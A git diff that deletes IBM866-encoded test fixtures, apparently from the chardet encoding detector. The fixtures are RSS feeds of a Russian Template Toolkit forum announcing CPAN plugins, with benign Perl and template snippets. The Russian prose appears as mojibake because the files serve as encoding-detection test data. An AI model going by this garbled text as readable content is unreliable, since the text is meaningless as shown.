¯א¨¬¥א, <a target="_blank" href="http://forum.template-toolkit.ru/view_forum/forum_id-6.html">®¢®בג¨ Template Toolkit</a>). ‚ ­¨¦­¥¬ ¯א ¢®¬ ד£«ד ¡א®ד§¥א  ¯®ן¢¨גבן §­ ח®× <img src="http://forum.template-toolkit.ru/attachments/000/138/138/rdf.gif" alt="RDF" />. „®בג ג®ח­® י¥«×­דגל ¯® §­ ח×ד ¨ ₪®¡ ¢¨גל ¯®₪¯¨ב×ד ¢ § ×« ₪ר. ®ב«¥ םג®£® ¢ § ×« ₪× ו ¯®ן¢¨גבן ¯ ¯×  &quot;®¢®בג¨ Template Toolkit&quot;, ¢ ×®ג®א®© ¯¥א¨®₪¨ח¥בר ¡ד₪דג ®¡­®¢«ןגלבן § £®«®¢×¨ ­®¢כו ג¥¬ ¢ ה®אד¬¥ &quot;®¢®בג¨ Template Toolkit&quot;. - - ‹®¡ ­®¢ ˆ£®אל <authors@template-toolkit.ru> - http://forum.template-toolkit.ru/view_topic/topic_id-40.html - ¡בד¦₪¥­¨¥ ה®אד¬  - http://forum.template-toolkit.ru/view_topic/topic_id-40.html?rss - - - http://forum.template-toolkit.ru/view_topic/topic_id-8.html?rss - Wed, 21 Jul 2004 14:52:30 GMT - ¯®₪¯¨בל [ƒ®בגל] - http://forum.template-toolkit.ru/view_topic/topic_id-8.html?rss - —ג®-ג® ­¥ ב®¢ב¥¬ ¯®­ןג­®¥ ג¢®א¨גבן.<br /> -¥­ן א ב¯®§­ ¥ג ב¨בג¥¬  × × Light Elf, ­® ¬®¨ ב®®¡י¥­¨ן ¯®¬¥ח מגבן ­ ₪¯¨בלמ [ƒ®בגל].<br /> -<br /> -ג® ג × ­ ₪®? - - Light Elf <authors@template-toolkit.ru> - http://forum.template-toolkit.ru/view_topic/topic_id-8.html - ¡בד¦₪¥­¨¥ ה®אד¬  - http://forum.template-toolkit.ru/view_topic/topic_id-8.html?rss - - - http://forum.template-toolkit.ru/view_topic/topic_id-7.html?rss - Tue, 20 Jul 2004 15:02:45 GMT - א®¡¥«כ ¢ ב®®¡י¥­¨ןו - http://forum.template-toolkit.ru/view_topic/topic_id-7.html?rss - …בגל ¯א¥₪«®¦¥­¨¥ ­¥ ד₪ «ןגל ¯א®¡¥«כ.<br /> -ב ¨ו ¯®¬®ילמ ד₪®¡­® ה®א¬ ג¨א®¢ גל ג¥×בג.<br /> -ב®¡¥­­® ×®₪. - - Light Elf <authors@template-toolkit.ru> - http://forum.template-toolkit.ru/view_topic/topic_id-7.html - ¡בד¦₪¥­¨¥ ה®אד¬  - http://forum.template-toolkit.ru/view_topic/topic_id-7.html?rss - - - http://forum.template-toolkit.ru/view_topic/topic_id-4.html?rss - Wed, 14 Jul 2004 06:13:38 GMT - „¢¨¦®× ה®אד¬  - http://forum.template-toolkit.ru/view_topic/topic_id-4.html?rss - ­¥ ב®¢ב¥¬ ¯®­ן«. <br /> -¬¡«¥¬×  ב¢¥אוד &quot;powered by [%TT2%]&quot; ®§­ ח ¥ג חג® םג®ג ה®אד¬ ב₪¥« ­ ­  TT2? - - UncleAndy <authors@template-toolkit.ru> - http://forum.template-toolkit.ru/view_topic/topic_id-4.html - ¡בד¦₪¥­¨¥ ה®אד¬  - http://forum.template-toolkit.ru/view_topic/topic_id-4.html?rss - - - http://forum.template-toolkit.ru/view_topic/topic_id-1.html?rss - Mon, 12 Jul 2004 04:25:44 GMT - ”®אד¬כ ®ג×אכגכ - http://forum.template-toolkit.ru/view_topic/topic_id-1.html?rss - 12 ¨מ«ן 2004 £®₪  ®ג×אכ«¨בל <span style="font-weight:bold">ה®אד¬כ Template Toolkit</span>. א¨£« ט מ ¢ב¥ו ¨­ג¥א¥בדמי¨ובן ¨ ¨ב¯®«ל§דמי¨ו ¢ א ¡®ג¥ ¡¨¡«¨®ג¥×ד Template Toolkit × דח בג¨מ.<br /><br />®¨ ¡« £®₪ א­®בג¨:<br /><br />„¬¨גא¨מ ¨×®« ¥¢ד §  ¯®₪₪¥א¦×ד, א בבכ«×ד ח¥א¥§ ¯®₪¯¨ב×ד Subscribe.Ru בג גל¨ ® Template Toolkit, ¯א¥₪®בג ¢«¥­¨¥ ה®אד¬  <a target="_blank" href="http://perl.dp.ua/cgi-bin/forum.pl?do=show&tema=1&page=1">Perl - ‡ ו®₪¨ ¨ דח¨בל</a> ¢ × ח¥בג¢¥ ה®אד¬  ¯®₪₪¥א¦×¨ ב ©ג  <a target="_blank" href="http://www.template-toolkit.ru/">Template Toolkit (אדבב× ן א¥₪ ×ז¨ן)</a>.<br /><br />‚ ₪¨¬ד ‘דו ­®¢ד §  ¯®₪₪¥א¦×ד ¨ ¨₪¥מ ב®§₪ ­¨ן םג¨ו ה®אד¬®¢.<br /><br /> ₪¥מבל, חג® ה®אד¬כ בג ­דג ¯®«¥§­כ¬¨ ₪«ן ג¥ו, ×ג® ¨ב¯®«ל§ד¥ג ¨«¨ ב®¡¨א ¥גבן ¨ב¯®«ל§®¢ גל ¢ ב¢®¨ו א §א ¡®ג× ו ¡¨¡«¨®ג¥×ד ¯® א ¡®ג¥ ב ט ¡«®­ ¬¨ Template Toolkit. ‘¯א ט¨¢ ©ג¥, ₪¥«¨ג¥בל, ®¡בד¦₪ ©ג¥.<br /><br /><span style="font-weight:bold">‘גאד×גדא  ה®אד¬  ¯א¥₪¢ א¨ג¥«ל­ ן</span>. £®ג®¢ ¢כב«דט גל ¨ דח¥בגל ¢ב¥ ¯א¥₪«®¦¥­¨ן ¯® ב®§₪ ­¨מ ­®¢כו ¢¥ג®× ¢ א ¬× ו ה®אד¬®¢ Template Toolkit.<br /><br />‘ ¬ ה®אד¬ ­ ¯¨ב ­ ב ¨ב¯®«ל§®¢ ­¨¥¬ Template Toolkit ¨ ¡ד₪¥ג ₪®א ¡ גכ¢ גלבן. ‚ב¥ § ¬¥ח ­¨ן ¨ ¯א¥₪«®¦¥­¨ן ¯א¨¢¥גבג¢דמגבן. - - ‹®¡ ­®¢ ˆ£®אל <authors@template-toolkit.ru> - http://forum.template-toolkit.ru/view_topic/topic_id-1.html - ¡בד¦₪¥­¨¥ ה®אד¬  - http://forum.template-toolkit.ru/view_topic/topic_id-1.html?rss - - - diff --git a/chardet/tests/IBM866/forum.template-toolkit.ru.6.xml b/chardet/tests/IBM866/forum.template-toolkit.ru.6.xml deleted file mode 100644 index 7bbe895..0000000 --- a/chardet/tests/IBM866/forum.template-toolkit.ru.6.xml +++ /dev/null @@ -1,486 +0,0 @@ - - - - - ”®אד¬כ Template Toolkit : ®¢®בג¨ Template Toolkit - http://forum.template-toolkit.ru/view_forum/forum_id-6.html?rss - Template Toolkit - ¡כבגא ן, ¬®י­ ן ¨ א בט¨אן¥¬ ן ב¨בג¥¬  ®¡א ¡®גר ט ¡«®­®¢.   ב ©ג¥ א ¡®ג ¥ג ה®אד¬, ¢ ×®ג®א®¬ ®¡בד¦₪ מגבן ¢®¯א®בכ ¨ב¯®«ל§®¢ ­¨ן ¡¨¡«¨®ג¥×¨ ¯® א ¡®ג¥ ב ט ¡«®­ ¬¨. €­®­בכ ¨ ­®¢®בג¨, ב¢ן§ ­­כ¥ ב Template Toolkit. - ru - Lobanov Igor - Lobanov Igor <webmaster@template-toolkit.ru> - Mon, 26 Dec 2005 16:28:41 GMT - Wed, 4 Jan 2006 02:29:01 GMT - Perl script, Template Toolkit - - http://forum.template-toolkit.ru/images/tt2powered.gif - Template Toolkit - ט ¡«®­כ ¢ perl - http://forum.template-toolkit.ru/ - 88 - 31 - - http://blogs.law.harvard.edu/tech/rss - - http://forum.template-toolkit.ru/view_topic/topic_id-122.html?rss - Mon, 19 Dec 2005 14:49:49 GMT - Template::Provider::FromDATA - § £אד§×  ט ¡«®­®¢ ¨§ ב¥×ז¨¨ __DATA__ - http://forum.template-toolkit.ru/view_topic/topic_id-122.html?rss -   CPAN ®¯ד¡«¨×®¢ ­  ¢¥אב¨ן 0.04 <a target="_blank" href="http://search.cpan.org/~bricas/Template-Provider-FromDATA/">¬®₪ד«ן Template::Provider::FromDATA</a>, ×®ג®אכ© ¯®§¢®«ן¥ג וא ­¨גל ט ¡«®­כ ¢¬¥בג¥ ב ×®₪®¬ ¢ ®₪­®¬ ה ©«¥ (ב¥×ז¨ן __DATA__).<br /><br />„«ן ¨ב¯®«ל§®¢ ­¨ן ₪ ­­®£® ¬®₪ד«ן ­¥®¡ו®₪¨¬® ¢­ ח «¥ ב®§₪ גל ם×§¥¬¯«ןא ¯א®¢ ©₪¥א  Template::Provider::FromDATA,   § ג¥¬ ד× § גל ¥£® ¢ × ח¥בג¢¥ ¯®בג ¢י¨×  ט ¡«®­®¢ ¢ ×®­בגאד×ג®א¥ Template:<br /><br /><div class="code"><pre>use Template; -use Template::Provider::FromDATA; - -# ‘®§₪ ס¬ ®¡ך¥×ג ¯®בג ¢י¨×  -my $provider = Template::Provider::FromDATA-&gt;new( { - CLASSES =&gt; __PACKAGE__ -} ); - -# “× §כ¢ ¥¬ ®¡ך¥×ג ¯®בג ¢י¨×  ¢ ®¯ז¨ן ×®­בגאד×ג®א  Template -my $template = Template-&gt;new( { - # ... - LOAD_TEMPLATES =&gt; [ $provider ] -} ); - -# ...ב ¬¨ ט ¡«®­כ ¢ ב¥×ז¨¨ __DATA__ - -__DATA__ - -__mytemplate__ -Foo [% bar %] - -__myothertemplate__ -Baz, [% qux %]?</pre></div> - - ‹®¡ ­®¢ ˆ£®אל <authors@template-toolkit.ru> - http://forum.template-toolkit.ru/view_topic/topic_id-122.html - Template Toolkit - ¡¨¡«¨®ג¥×  ₪«ן א ¡®גכ ב ט ¡«®­ ¬¨ ¢ Perl - http://forum.template-toolkit.ru/view_topic/topic_id-122.html?rss - - - http://forum.template-toolkit.ru/view_topic/topic_id-121.html?rss - Mon, 19 Dec 2005 14:10:59 GMT - Template::Plugin::HTML::Strip - ד₪ «¥­¨¥ HTML-ג¥£®¢ ¨§ ג¥×בג  - http://forum.template-toolkit.ru/view_topic/topic_id-121.html?rss -   CPAN ®¯ד¡«¨×®¢ ­  ¢¥אב¨ן 0.01 ¬®₪ד«ן <a target="_blank" href="http://search.cpan.org/~gsimmons/Template-Plugin-HTML-Strip/">¬®₪ד«ן Template::Plugin::HTML::Strip</a>. ®₪ד«ל ¯א¥₪®בג ¢«ן¥ג ¯« £¨­, ×®ג®אכ© ¯®§¢®«ן¥ג ד₪ «ןגל ¨§ ג¥×בג  HTML-ג¥£¨.<br /><br /><div class="code"><pre>[% USE HTML.Strip %] - -[% FILTER html_strip %] -&lt;title&gt;People for the Preservation of Presentational Markup&lt;/title&gt; -&lt;h1&gt;HTML::Strip - A cause for concern?&lt;/h1&gt; -[% END %] - -[% USE HTML.Strip 'strip' - striptags = [ 'script' 'iframe' ] - emit_spaces = 0 -%] - -[% FILTER strip %] -&lt;p&gt;A call to arms against the removal of our elements!&lt;/p&gt; -[% END %]</pre></div> - - ‹®¡ ­®¢ ˆ£®אל <authors@template-toolkit.ru> - http://forum.template-toolkit.ru/view_topic/topic_id-121.html - Template Toolkit - ¡¨¡«¨®ג¥×  ₪«ן א ¡®גכ ב ט ¡«®­ ¬¨ ¢ Perl - http://forum.template-toolkit.ru/view_topic/topic_id-121.html?rss - - - http://forum.template-toolkit.ru/view_topic/topic_id-115.html?rss - Sun, 6 Nov 2005 08:46:17 GMT - Template::Plugin::Subst - § ¬¥­  ג¥×בג  ב ¯®¬®ילמ א¥£ד«ןא­כו ¢כא ¦¥­¨© - http://forum.template-toolkit.ru/view_topic/topic_id-115.html?rss -   CPAN ®¯ד¡«¨×®¢ ­ <a target="_blank" href="http://search.cpan.org/~nikc/Template-Plugin-Subst/">¬®₪ד«ל Template::Plugin::Subst</a>, ×®ג®אכ© ¯®§¢®«ן¥ג ¢כ¯®«­ןגל § ¬¥­כ ¢ ג¥×בג¥ ב ¨ב¯®«ל§®¢ ­¨¥¬ א¥£ד«ןא­כו ¢כא ¦¥­¨©.<br /><br />ˆב¯®«ל§®¢ ­¨¥ ¢¨אגד «ל­®£® ¬¥ג®₪  <span style="font-weight:bold">subst</span><br /><div class="code"><pre>[% USE Subst %] -[% str = 'ט¨«® ­  ¬כ«®' %] -[% str.subst('(ט¨«®|¬כ«®) ­  (¬כ«®|ט¨«®)', '$2 ­  $1', 1) %]</pre></div><br /><br />ˆב¯®«ל§®¢ ­¨¥ ה¨«לגא <br /><div class="code"><pre>[% USE filt = Subst - pattern = '(ט¨«®|¬כ«®) ­  (¬כ«®|ט¨«®)' - replacement = '$2 ­  $1' - global = 1 %] -[% FILTER $filt %] -ט¨«® ­  ¬כ«® -[% END %]</pre></div> - - ‹®¡ ­®¢ ˆ£®אל <authors@template-toolkit.ru> - http://forum.template-toolkit.ru/view_topic/topic_id-115.html - Template Toolkit - ¡¨¡«¨®ג¥×  ₪«ן א ¡®גכ ב ט ¡«®­ ¬¨ ¢ Perl - http://forum.template-toolkit.ru/view_topic/topic_id-115.html?rss - - - http://forum.template-toolkit.ru/view_topic/topic_id-111.html?rss - Sat, 1 Oct 2005 06:52:16 GMT - Template::Plugin::ASCIITable - ¢כ¢®₪ ג¥×בג®¢כו ג ¡«¨ז - http://forum.template-toolkit.ru/view_topic/topic_id-111.html?rss -   CPAN ®¯ד¡«¨×®¢ ­  ¢¥אב¨ן 0.1 <a target="_blank" href="http://search.cpan.org/~dakkar/Template-Plugin-ASCIITable/">¬®₪ד«ן Template::Plugin::ASCIITable</a>, ×®ג®אכ© ¯®§¢®«ן¥ג א¨ב®¢ גל ג¥×בג®¢כ¥ ג ¡«¨זכ.<br /><br /><div class="code"><pre>[% - USE ASCIITable; - ASCIITable.cols('a', 'b', 'c'); - ASCIITable.rows([1,2,3],['one','two','three']); - ASCIITable.draw() -%]</pre></div><br />‚כ¢®₪:<br /><br /><div class="code"><pre> -.=----+-----+------=. -| a | b | c | -|=----+-----+------=| -| 1 | 2 | 3 | -| one | two | three | -'=----+-----+------='</pre></div><br /><br />« £¨­ ¯®§¢®«ן¥ג ­ בגא ¨¢ גל ¯ א ¬¥גאכ ג ¡«¨זכ,   ג ×¦¥ ב®§₪ ¢ גל ב®¡בג¢¥­­כ¥ בג¨«¨ א ¬®×. - - ‹®¡ ­®¢ ˆ£®אל <authors@template-toolkit.ru> - http://forum.template-toolkit.ru/view_topic/topic_id-111.html - Template Toolkit - ¡¨¡«¨®ג¥×  ₪«ן א ¡®גכ ב ט ¡«®­ ¬¨ ¢ Perl - http://forum.template-toolkit.ru/view_topic/topic_id-111.html?rss - - - http://forum.template-toolkit.ru/view_topic/topic_id-102.html?rss - Thu, 21 Jul 2005 05:47:32 GMT - Template::Plugin::Perl - ם×ב¯®אג אן₪  הד­×ז¨© Perl ¢ ט ¡«®­כ - http://forum.template-toolkit.ru/view_topic/topic_id-102.html?rss -   CPAN ®¯ד¡«¨×®¢ ­ <a target="_blank" href="http://search.cpan.org/~agent/Template-Plugin-Perl/">¬®₪ד«ל Template::Plugin::Perl</a>, ¯א¥₪®בג ¢«ןמי¨© אן₪ ¯®«¥§­כו הד­×ז¨© Perl.<br /><br /><div class="code"><pre>[% USE Perl %] -[% Perl.log(100) %] -[% Perl.rand(1) %] -[% Perl.exp(2) %] -[% Perl.sprintf(&quot;%.0f&quot;, 3.5) %] -[% Perl.pow(2, 3) %] # 2 ** 3; -[% Perl.eval('2**3') %] -[% Perl.sin(3.14) %] -[% Perl.cos(0) %] -[% Perl.join(',', 'a', 'b', 'c') %] -[% list = ['a','b','c']; - Perl.join(',' list) %]</pre></div> - - ‹®¡ ­®¢ ˆ£®אל <authors@template-toolkit.ru> - http://forum.template-toolkit.ru/view_topic/topic_id-102.html - Template Toolkit - ¡¨¡«¨®ג¥×  ₪«ן א ¡®גכ ב ט ¡«®­ ¬¨ ¢ Perl - http://forum.template-toolkit.ru/view_topic/topic_id-102.html?rss - - - http://forum.template-toolkit.ru/view_topic/topic_id-101.html?rss - Thu, 21 Jul 2005 04:37:32 GMT - Template::Plugin::POSIX - POSIX הד­×ז¨¨ ¢ ט ¡«®­ ו - http://forum.template-toolkit.ru/view_topic/topic_id-101.html?rss -   CPAN ®¯ד¡«¨×®¢ ­ <a target="_blank" href="http://search.cpan.org/~agent/Template-Plugin-POSIX/">¬®₪ד«ל Template::Plugin::POSIX</a>. ®₪ד«ל ¯®§¢®«ן¥ג ¨ב¯®«ל§®¢ גל ¢ ט ¡«®­ ו הד­×ז¨¨ POSIX.<br /><br /><div class="code"><pre>[% USE POSIX %] -[% POSIX.log(100) %] -[% POSIX.rand(1) %] -[% POSIX.exp(2) %] -[% POSIX.sprintf(&quot;%.0f&quot;, 3.5) %] -[% POSIX.pow(2, 3) %] -[% POSIX.ceil(3.8) %] -[% POSIX.floor(3.8) %] -[% POSIX.sin(3.14) %] -[% POSIX.cos(0) %]</pre></div> - - ‹®¡ ­®¢ ˆ£®אל <authors@template-toolkit.ru> - http://forum.template-toolkit.ru/view_topic/topic_id-101.html - Template Toolkit - ¡¨¡«¨®ג¥×  ₪«ן א ¡®גכ ב ט ¡«®­ ¬¨ ¢ Perl - http://forum.template-toolkit.ru/view_topic/topic_id-101.html?rss - - - http://forum.template-toolkit.ru/view_topic/topic_id-96.html?rss - Mon, 11 Jul 2005 04:05:37 GMT - Template::Plugin::Decode - ¯א¥®¡א §®¢ ­¨¥ ¢כ¢®₪  ¢ Unicode - http://forum.template-toolkit.ru/view_topic/topic_id-96.html?rss -   CPAN ®¯ד¡«¨×®¢ ­ <a target="_blank" href="http://search.cpan.org/~lyokato/Template-Plugin-Decode/">¬®₪ד«ל Template::Plugin::Decode</a>, ×®ג®אכ© ¯א¥₪®בג ¢«ן¥ג ב¯®ב®¡ ¯א¥®₪®«¥גל ב«®¦­®בג¨ ב ¨ב¯®«ל§®¢ ­¨¥¬ ¢ ט ¡«®­ ו UTF-8.<br /><br /><div class="code"><pre>‚­ ח «¥ [% USE Decode %]. -‡ ג¥¬ ¬®¦­® ¨ב¯®«ל§®¢ גל ה¨«לגא 'decode'. -ג®ג ה¨«לגא ¯א¥®¡א §ד¥ג בגא®×ד ¨§ UTF-8 ¢® ¢­דגא¥­­¨© unicode-ה®א¬ ג Perl: -[% multibyte_str | decode %]</pre></div><br />€¢ג®א ¬®₪ד«ן ¯א¥₪« £ ¥ג ב«¥₪דמי¨© ¯®₪ו®₪. ‚ × ח¥בג¢¥ ×®₪¨א®¢×¨ ט ¡«®­®¢ ¨ב¯®«ל§ד¥גבן UTF-8. ” ©«כ ₪®«¦­כ ב®₪¥א¦ גל BOM-§ ¯¨בל. ‚ב¥ ¢ו®₪­כ¥ ₪ ­­כ¥ ₪¥×®₪¨אדמגבן ה¨«לגא®¬ decode. - - ‹®¡ ­®¢ ˆ£®אל <authors@template-toolkit.ru> - http://forum.template-toolkit.ru/view_topic/topic_id-96.html - Template Toolkit - ¡¨¡«¨®ג¥×  ₪«ן א ¡®גכ ב ט ¡«®­ ¬¨ ¢ Perl - http://forum.template-toolkit.ru/view_topic/topic_id-96.html?rss - - - http://forum.template-toolkit.ru/view_topic/topic_id-94.html?rss - Sat, 2 Jul 2005 06:41:54 GMT - Template::Plugin::XSLT - XSLT-¯א¥®¡א §®¢ ­¨¥ XML - http://forum.template-toolkit.ru/view_topic/topic_id-94.html?rss -   CPAN ®¯ד¡«¨×®¢ ­  ¢¥אב¨ן 1.2 <a target="_blank" href="http://search.cpan.org/~scott/Template-Plugin-XSLT/">¬®₪ד«ן Template::Plugin::XSLT</a>, ¢ ×®ג®א®¬ א¥ «¨§®¢ ­ ה¨«לגא, ¯®§¢®«ןמי¨© ¯א®¨§¢®₪¨גל XSLT-¯א¥®¡א §®¢ ­¨ן הא £¬¥­ג  XML.<br /><br /><div class="code"><pre>[% USE transform = XSLT(&quot;stylesheet.xsl&quot;); %] - ... -[% foo.as_xml | $transform foo = '&quot;bar&quot;' baz = 123 %]</pre></div> - - ‹®¡ ­®¢ ˆ£®אל <authors@template-toolkit.ru> - http://forum.template-toolkit.ru/view_topic/topic_id-94.html - Template Toolkit - ¡¨¡«¨®ג¥×  ₪«ן א ¡®גכ ב ט ¡«®­ ¬¨ ¢ Perl - http://forum.template-toolkit.ru/view_topic/topic_id-94.html?rss - - - http://forum.template-toolkit.ru/view_topic/topic_id-88.html?rss - Tue, 24 May 2005 11:28:04 GMT - Template::Plugin::NakedBody - ¢כ₪¥«¥­¨¥ BODY-ב®בג ¢«ןמי¥© HTML-₪®×ד¬¥­ג  - http://forum.template-toolkit.ru/view_topic/topic_id-88.html?rss -   CPAN ®¯ד¡«¨×®¢ ­  ¢¥אב¨ן 0.02 <a target="_blank" href="http://search.cpan.org/~adamk/Template-Plugin-NakedBody/">¬®₪ד«ן Template::Plugin::NakedBody</a>. „ ­­כ© ¬®₪ד«ל א¥ «¨§ד¥ג ה¨«לגא, ×®ג®אכ© ¢כ₪¥«ן¥ג ב®₪¥א¦¨¬®¥ HTML-₪®×ד¬¥­ג  ¬¥¦₪ד ג¥£ ¬¨ &lt;BODY&gt; ¨ &lt;/BODY&gt;.  × ­ ¯¨ב ­® ¢ ₪®×ד¬¥­ג ז¨¨ םג® ®× §כ¢ ¥גבן ד₪®¡­® ¯א¨ א ¡®ג¥ ב ₪¨§ ©­¥א ¬¨. א¨ ¢×«מח¥­¨¨ ¯®₪£®ג®¢«¥­­כו ¨¬¨ ₪®×ד¬¥­ג®¢ ­¥ג ­¥®¡ו®₪¨¬®בג¨ ₪®¯®«­¨ג¥«ל­® א¥₪ ×ג¨א®¢ גל ₪®×ד¬¥­ג.<br /><br /><div class="code"><pre># included.html -# ‚ html-א¥₪ ×ג®א¥ ד₪®¡­® א ¡®ג גל ב ¯®«­כ¬ ₪®×ד¬¥­ג®¬ -&lt;html&gt; -&lt;head&gt; -&lt;style ...&gt; -&lt;/head&gt; -&lt;body&gt; -—ג®¡כ ¢¨₪¥גל ¯א ¢¨«ל­® םג®ג ×®­ג¥­ג ­ד¦­כ ג ¡«¨זכ בג¨«¥©. -&lt;/body&gt; -&lt;/html&gt; - -# mypage.html -[% USE NakedBody %] -&lt;html&gt; -&lt;head&gt; -&lt;style ...&gt; -&lt;/head&gt; -&lt;body&gt; -®­ג¥­ג ¨בו®₪­®£® ₪®×ד¬¥­ג . -‡ ג¥¬ ¢×«מח ¥גבן ₪®×ד¬¥­ג, ¯®₪£®ג®¢«¥­­כ© ₪¨§ ©­¥א®¬. -[% INCLUDE included.html | NakedBody %] -א®₪®«¦¥­¨¥ ¨בו®₪­®£® ₪®×ד¬¥­ג . -&lt;/body&gt; -&lt;/html&gt;</pre></div> - - ‹®¡ ­®¢ ˆ£®אל <authors@template-toolkit.ru> - http://forum.template-toolkit.ru/view_topic/topic_id-88.html - Template Toolkit - ¡¨¡«¨®ג¥×  ₪«ן א ¡®גכ ב ט ¡«®­ ¬¨ ¢ Perl - http://forum.template-toolkit.ru/view_topic/topic_id-88.html?rss - - - http://forum.template-toolkit.ru/view_topic/topic_id-87.html?rss - Sat, 21 May 2005 08:04:46 GMT - CGI::Application::Plugin::AnyTemplate - ¨­ג¥אה¥©ב × ®ב­®¢­כ¬ ב¨בג¥¬ ¬ ט ¡«®­®¢ - http://forum.template-toolkit.ru/view_topic/topic_id-87.html?rss -   CPAN ®¯ד¡«¨×®¢ ­  <a target="_blank" href="http://backpan.cpan.org/authors/id/M/MG/MGRAHAM/CGI-Application-Plugin-AnyTemplate-0.04.tar.gz">¢¥אב¨ן 0.04 ¬®₪ד«ן CGI::Application::Plugin::AnyTemplate</a>. „ ­­כ© ¬®₪ד«ל ב®₪¥א¦¨ג ®¡®¡י¥­­כ© ¨­ג¥אה¥©ב ₪«ן א ¡®גכ ב «מ¡®© ¨§¢¥בג­®© ב¨בג¥¬®© ט ¡«®­®¢ Perl (¢ ­ בג®ןי¨© ¬®¬¥­ג ¯®₪₪¥א¦¨¢ מגבן <span style="font-weight:bold">HTML::Template</span>, <span style="font-weight:bold">HTML::Template::Expr</span>, <span style="font-weight:bold">Petal</span> ¨ <span style="font-weight:bold">Template Toolkit</span>) ¨§ ¯א¨«®¦¥­¨©, ¨ב¯®«ל§דמי¨ו ¢ × ח¥בג¢¥ ×®­גא®««¥א  CGI::Application. - - ‹®¡ ­®¢ ˆ£®אל <authors@template-toolkit.ru> - http://forum.template-toolkit.ru/view_topic/topic_id-87.html - Template Toolkit - ¡¨¡«¨®ג¥×  ₪«ן א ¡®גכ ב ט ¡«®­ ¬¨ ¢ Perl - http://forum.template-toolkit.ru/view_topic/topic_id-87.html?rss - - - http://forum.template-toolkit.ru/view_topic/topic_id-84.html?rss - Sun, 15 May 2005 14:37:34 GMT - Inline::TT - ¢×«מח¥­¨¥ ט ¡«®­®¢ ¢ ב×א¨¯ג - http://forum.template-toolkit.ru/view_topic/topic_id-84.html?rss -   CPAN ®¯ד¡«¨×®¢ ­  ¢¥אב¨ן 0.04 <a target="_blank" href="http://search.cpan.org/~philcrow/Inline-TT/">¬®₪ד«ן Inline::TT</a>, ×®ג®אכ© ¯®§¢®«ן¥ג ¢×«מח גל ט ¡«®­כ ¢ ב×א¨¯ג ב ב®וא ­¥­¨¥¬ ¢®§¬®¦­®בג¨ ×¥ט¨א®¢ ­¨ן ®ג×®¬¯¨«¨א®¢ ­­כו ט ¡«®­®¢.<br /><br /><div class="code"><pre> -use Inline TT =&gt; 'DATA'; - -# ¨¬¥­  ¡«®×®¢ ם×ב¯®אג¨אדמגבן × × הד­×ז¨¨ -print hello( { name =&gt; 'Rob' } ), &quot;\n&quot;; -print goodbye( { name =&gt; 'Rob' } ), &quot;\n&quot;; - -__DATA__ -__TT__ -[% BLOCK hello %] -&lt;H1&gt; Hello [% name %], how are you? &lt;/H1&gt; -[% END %] -[% BLOCK goodbye %] -&lt;H1&gt; Goodbye [% name %], have a nice day. &lt;/H1&gt; -[% END %]</pre></div><br /><div class="code"><pre>use Inline TT =&gt; &lt;&lt; EO_TEMPLATE -[% BLOCK hello %] -&lt;H1&gt; Hello [% name %], how are you? &lt;/H1&gt; -[% END %] -[% BLOCK goodbye %] -&lt;H1&gt; Goodbye [% name %], have a nice day. &lt;/H1&gt; -[% END %] -EO_TEMPLATE - -print hello( { name =&gt; 'Rob' } ), &quot;\n&quot;; -print goodbye( { name =&gt; 'Rob' } ), &quot;\n&quot;;</pre></div> - - ‹®¡ ­®¢ ˆ£®אל <authors@template-toolkit.ru> - http://forum.template-toolkit.ru/view_topic/topic_id-84.html - Template Toolkit - ¡¨¡«¨®ג¥×  ₪«ן א ¡®גכ ב ט ¡«®­ ¬¨ ¢ Perl - http://forum.template-toolkit.ru/view_topic/topic_id-84.html?rss - - - http://forum.template-toolkit.ru/view_topic/topic_id-81.html?rss - Sat, 7 May 2005 12:41:26 GMT - Template::Plugin::HTML::Prototype - £¥­¥א ז¨ן Ajax-×®₪  ¢ ט ¡«®­ ו - http://forum.template-toolkit.ru/view_topic/topic_id-81.html?rss -   CPAN ®¯ד¡«¨×®¢ ­  <a target="_blank" href="http://backpan.cpan.org/authors/id/B/BA/BAUERB/Template-Plugin-HTML-Prototype-0.01.tar.gz">¢¥אב¨ן 0.01 ¬®₪ד«ן Template::Plugin::HTML::Prototype</a>. „ ­­כ© ¬®₪ד«ל ¯א¥₪®בג ¢«ן¥ג ¨­ג¥אה¥©ב × ¬®₪ד«מ HTML::Prototype, ×®ג®אכ© ב®₪¥א¦¨ג הד­×ז¨¨ ₪«ן £¥­¥א ז¨¨ ×®₪  <a target="_blank" href="http://prototype.conio.net/">Javascript-¡¨¡«¨®ג¥×¨ Prototype</a>. Prototype ¨ב¯®«ל§ד¥גבן ¢ ח בג­®בג¨ ¢ <span style="font-weight:bold">Ruby on Rails</span> ¨ ב®₪¥א¦¨ג ®¡ך¥×ג­®-®א¨¥­ג¨א®¢ ­­דמ א¥ «¨§ ז¨מ <span style="font-weight:bold">Ajax</span>.<br /><br /><div class="code"><pre> [% USE proto = HTML::Prototype %] - - [% proto.define_javascript_functions %] - [% proto.form_remote_tag(...) %] - [% proto.link_to_function(...) %] - [% proto.link_to_remote(...) %] - [% proto.observe_field(...) %] - [% proto.observe_form(...) %] - [% proto.periodically_call_remote(...) %] - [% proto.submit_to_remote(...) %]</pre></div> - - ‹®¡ ­®¢ ˆ£®אל <authors@template-toolkit.ru> - http://forum.template-toolkit.ru/view_topic/topic_id-81.html - Template Toolkit - ¡¨¡«¨®ג¥×  ₪«ן א ¡®גכ ב ט ¡«®­ ¬¨ ¢ Perl - http://forum.template-toolkit.ru/view_topic/topic_id-81.html?rss - - - http://forum.template-toolkit.ru/view_topic/topic_id-75.html?rss - Tue, 12 Apr 2005 12:23:30 GMT - Template::Multilingual - ¯®₪₪¥א¦×  ­¥ב×®«לרו ן§כ×®¢ ¢ ט ¡«®­ ו - http://forum.template-toolkit.ru/view_topic/topic_id-75.html?rss -   CPAN ®¯ד¡«¨×®¢ ­  <a target="_blank" href="http://backpan.cpan.org/authors/id/C/CH/CHOLET/Template-Multilingual-0.02.tar.gz">¢¥אב¨ן 0.02 ¬®₪ד«ן Template::Multilingual</a>. ג®ג ¬®₪ד«ל ן¢«ן¥גבן ¯א®¨§¢®₪­כ¬ ®ג Template ¨ ¯א¥₪« £ ¥ג א¥ «¨§ ז¨מ ¯®₪₪¥א¦×¨ ­¥ב×®«לרו ן§כ×®¢ ¢ ט ¡«®­ ו.<br /><br />®₪:<br /><div class="code"><pre>use Template::Multilingual; -my $template = Template::Multilingual-&gt;new(); -$template-&gt;language('en'); -$template-&gt;process('example.ttml');</pre></div><br />˜ ¡«®­:<br /><div class="code"><pre> -&lt;t&gt; - &lt;en&gt;Hello!&lt;/en&gt; - &lt;fr&gt;Bonjour!&lt;/fr&gt; - 